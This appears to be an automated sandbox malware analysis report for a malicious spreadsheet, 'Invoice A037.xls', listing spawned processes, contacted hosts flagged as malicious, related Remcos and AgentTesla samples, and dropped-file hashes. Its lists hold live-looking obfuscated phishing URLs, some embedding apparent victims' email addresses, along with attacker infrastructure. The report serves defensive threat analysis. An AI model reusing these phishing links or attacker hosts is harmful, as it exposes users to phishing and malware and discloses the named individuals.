                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        23.95.235.29
                                                        unknownUnited States
                                                        36352AS-COLOCROSSINGUStrue
                                                        151.101.1.137
                                                        cloudinary.map.fastly.netUnited States
                                                        54113FASTLYUSfalse
                                                        45.63.94.214
                                                        paste.rsUnited States
                                                        20473AS-CHOOPAUStrue
                                                        54.150.207.131
                                                        short.ruksk.comUnited States
                                                        16509AMAZON-02USfalse
                                                        IP
                                                        192.168.2.255
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1572970
                                                        Start date and time:2024-12-11 10:52:29 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 3s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                        Number of analysed new started processes analysed:31
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • GSI enabled (VBA)
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:Invoice A037.xls
                                                        Detection:MAL
                                                        Classification:mal100.spre.phis.troj.expl.evad.winXLS@38/53@27/5
                                                        EGA Information:
                                                        • Successful, ratio: 33.3%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 10
                                                        • Number of non-executed functions: 1
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .xls
                                                        • Changed system and user locale, location and keyboard layout to French - France
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Active ActiveX Object
                                                        • Active ActiveX Object
                                                        • Active ActiveX Object
                                                        • Scroll down
                                                        • Close Viewer
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                        • Execution Graph export aborted for target mshta.exe, PID 2556 because there are no executed function
                                                        • Execution Graph export aborted for target mshta.exe, PID 3516 because there are no executed function
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        04:53:54API Interceptor131x Sleep call for process: mshta.exe modified
                                                        04:53:59API Interceptor191x Sleep call for process: powershell.exe modified
                                                        04:54:00API Interceptor190x Sleep call for process: AcroRd32.exe modified
                                                        04:54:09API Interceptor188x Sleep call for process: wscript.exe modified
                                                        04:54:16API Interceptor4x Sleep call for process: RdrCEF.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        23.95.235.29Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                SecuriteInfo.com.FileRepMalware.21353.16266.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                    PROFORMA INVOICE.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        Document.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                            151.101.1.137Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                  #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                    nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                      1013911.jsGet hashmaliciousFormBookBrowse
                                                                                        http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                          https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                            https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                              https://www.postman.com/postman-account/Get hashmaliciousUnknownBrowse
                                                                                                54.150.207.131Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                      Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                          OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                                                  FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    cloudinary.map.fastly.netPlugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                    • 151.101.129.137
                                                                                                                    PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                    • 151.101.129.137
                                                                                                                    New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                    • 151.101.193.137
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.65.137
                                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 151.101.65.137
                                                                                                                    Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    xxx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.193.137
                                                                                                                    atthings.docGet hashmaliciousRemcosBrowse
                                                                                                                    • 151.101.65.137
                                                                                                                    16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    short.ruksk.comDocument.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    paste.eePO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                    • 104.21.84.67
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                    • 104.21.84.67
                                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.96.6
                                                                                                                    Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                    • 172.67.187.200
                                                                                                                    ithgreat.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    xxx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.96.6
                                                                                                                    Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                                                    • 172.67.187.200
                                                                                                                    fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    FASTLYUSPlugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                    • 151.101.129.137
                                                                                                                    https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 151.101.1.108
                                                                                                                    https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.194.137
                                                                                                                    EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    https://vcsfi.kidsavancados.com/Get hashmaliciousCaptcha PhishBrowse
                                                                                                                    • 151.101.66.137
                                                                                                                    http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.64.84
                                                                                                                    https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                    • 151.101.194.137
                                                                                                                    AMAZON-02USDocument.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.150.207.131
                                                                                                                    https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.227.8.47
                                                                                                                    wheiuwa4.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 54.171.230.55
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 18.141.10.107
                                                                                                                    https://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 108.158.75.45
                                                                                                                    arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 34.249.145.219
                                                                                                                    sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.171.230.55
                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.171.230.55
                                                                                                                    6dKYHqbvOm.exeGet hashmaliciousNjratBrowse
                                                                                                                    • 35.158.159.254
                                                                                                                    AS-COLOCROSSINGUSDocument.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 107.172.44.175
                                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 107.172.44.175
                                                                                                                    Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.170.167.20
                                                                                                                    hax.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 107.172.219.218
                                                                                                                    ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                    • 192.3.220.6
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 172.245.142.60
                                                                                                                    matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                    • 192.3.101.9
                                                                                                                    FACTURA.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                    • 192.210.150.26
                                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 172.245.142.60
                                                                                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 172.245.123.29
                                                                                                                    AS-CHOOPAUSrAlZ2pGOUn.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.77.204.56
                                                                                                                    rAlZ2pGOUn.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.77.204.56
                                                                                                                    bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                    • 136.244.92.62
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    05af1f5ca1b87cc9cc9b25185115607dRequest for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    Estado_de_cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    atthings.docGet hashmaliciousRemcosBrowse
                                                                                                                    • 151.101.1.137
                                                                                                                    7dcce5b76c8b17472d024758970a406btqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    FACTURA.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    Estado_de_cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                    • 45.63.94.214
                                                                                                                    • 54.150.207.131
                                                                                                                    No context
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):270336
                                                                                                                    Entropy (8bit):0.0018885380473555064
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE+//ql:/M/xT02zHql
                                                                                                                    MD5:125B296DD690A991FDEFA84B0C1C614C
                                                                                                                    SHA1:48E0FE2F932645D2788E99F6EE68B9BED1586A01
                                                                                                                    SHA-256:31AB9BAEFCD31A807B1FDE454C944B77696F7DFBD22CF7EC473A09166F837B2C
                                                                                                                    SHA-512:A6DA96C8E470447CDD727DC54A25050D08BFCA67E3B62077C06AB7FBEFA04193BB9653912E85B3D68CB7F8CF1372076B28CD2EA1C5D68324FBF39108BFDFB2BA
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):289
                                                                                                                    Entropy (8bit):5.222455075880543
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:7h/SVq2PP2nKuAl9OmbnIFUt8O/gZmw+OXwIkwOP2nKuAl9OmbjLJ:7JSVvWHAahFUt8O/g/+OXwI57HAaSJ
                                                                                                                    MD5:336DA6B31F8F1C8F3B0112103D5C73BF
                                                                                                                    SHA1:B7691B3C1C9D5D4848A6A83C1E374411D9F5B80E
                                                                                                                    SHA-256:3023CABE443FCDBC32C2C176EBE86C71D09214BC1E38A2877010BED7A2409C88
                                                                                                                    SHA-512:C096133DAE31AFE5EF17F3DF9EE94384CE550B16C8A8399230CA2E43C2CAA10B9A31413CD09C841F8D39CCF983E897AF0F6FCAE05A84321864A9FF35D7F99E0A
                                                                                                                    Malicious:false
                                                                                                                    Preview:2024/12/11-04:54:19.333 800 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-04:54:19.336 800 Recovering log #3.2024/12/11-04:54:19.337 800 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):289
                                                                                                                    Entropy (8bit):5.222455075880543
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:7h/SVq2PP2nKuAl9OmbnIFUt8O/gZmw+OXwIkwOP2nKuAl9OmbjLJ:7JSVvWHAahFUt8O/g/+OXwI57HAaSJ
                                                                                                                    MD5:336DA6B31F8F1C8F3B0112103D5C73BF
                                                                                                                    SHA1:B7691B3C1C9D5D4848A6A83C1E374411D9F5B80E
                                                                                                                    SHA-256:3023CABE443FCDBC32C2C176EBE86C71D09214BC1E38A2877010BED7A2409C88
                                                                                                                    SHA-512:C096133DAE31AFE5EF17F3DF9EE94384CE550B16C8A8399230CA2E43C2CAA10B9A31413CD09C841F8D39CCF983E897AF0F6FCAE05A84321864A9FF35D7F99E0A
                                                                                                                    Malicious:false
                                                                                                                    Preview:2024/12/11-04:54:19.333 800 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-04:54:19.336 800 Recovering log #3.2024/12/11-04:54:19.337 800 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):289
                                                                                                                    Entropy (8bit):5.222455075880543
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:7h/SVq2PP2nKuAl9OmbnIFUt8O/gZmw+OXwIkwOP2nKuAl9OmbjLJ:7JSVvWHAahFUt8O/g/+OXwI57HAaSJ
                                                                                                                    MD5:336DA6B31F8F1C8F3B0112103D5C73BF
                                                                                                                    SHA1:B7691B3C1C9D5D4848A6A83C1E374411D9F5B80E
                                                                                                                    SHA-256:3023CABE443FCDBC32C2C176EBE86C71D09214BC1E38A2877010BED7A2409C88
                                                                                                                    SHA-512:C096133DAE31AFE5EF17F3DF9EE94384CE550B16C8A8399230CA2E43C2CAA10B9A31413CD09C841F8D39CCF983E897AF0F6FCAE05A84321864A9FF35D7F99E0A
                                                                                                                    Malicious:false
                                                                                                                    Preview:2024/12/11-04:54:19.333 800 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-04:54:19.336 800 Recovering log #3.2024/12/11-04:54:19.337 800 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):131072
                                                                                                                    Entropy (8bit):0.005597679101775777
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
                                                                                                                    MD5:FD55D575475A6BD81B055F46FA34BA8B
                                                                                                                    SHA1:289A6344929F221E19D2F9097A5907FE42C03855
                                                                                                                    SHA-256:261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
                                                                                                                    SHA-512:F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
                                                                                                                    Malicious:false
                                                                                                                    Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:PostScript document text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):536
                                                                                                                    Entropy (8bit):5.169975207806005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                                                    MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                                                    SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                                                    SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                                                    SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                                                    Malicious:false
